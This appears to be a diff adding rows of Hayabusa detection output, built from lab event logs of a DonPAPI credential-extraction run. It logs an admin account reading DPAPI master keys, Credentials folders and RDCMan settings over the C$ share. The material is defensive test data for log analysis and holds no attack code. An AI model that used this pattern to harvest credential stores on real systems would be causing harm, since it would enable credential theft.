+2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234\eca8ffbf-fcd6-4e81-a424-36116606541f | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.800 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\084aa96d-4fd0-4004-802f-dad10353ce8b | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.833 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\0f51cf18-7e42-4905-a5e2-4dcd2016ba02 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.833 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\48f8844f-6a0e-44cc-b4c9-4b6aeb83bdcd | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\5dd255ba-fb23-45a9-8f1c-3efe30e43a08 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.865 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\7ac45d37-fa59-41b4-a80a-cb9224e97518 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.865 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\85b74294-ac3a-4166-8db9-0eb9596ae80e | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\cbd1402e-96f2-4c55-a4b3-990c71387659 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.896 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\e1d47273-0077-4091-9c01-88df1f2b8983 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.896 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\0d670005-17c4-4245-8305-54f955fcb04a | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.927 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\521f9c27-57b0-4cbb-bba2-5155c9b3fdbd | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.927 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\afe30aef-f67e-4cea-9b91-71318f566140 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\fd60f910-8888-473c-b62a-b304e884cfef | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\ff8d1c3a-73ac-4d33-b09f-51dcf8ae55ef | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.958 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.977 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.978 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\76515ee5-f236-486e-ba36-3ac0ee10be88 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\9482b28c-116d-4469-a3ed-46d2902c2d4b | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.997 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\afb26c33-05ad-49ff-a854-61607af4edfc | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.997 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.034 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.037 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
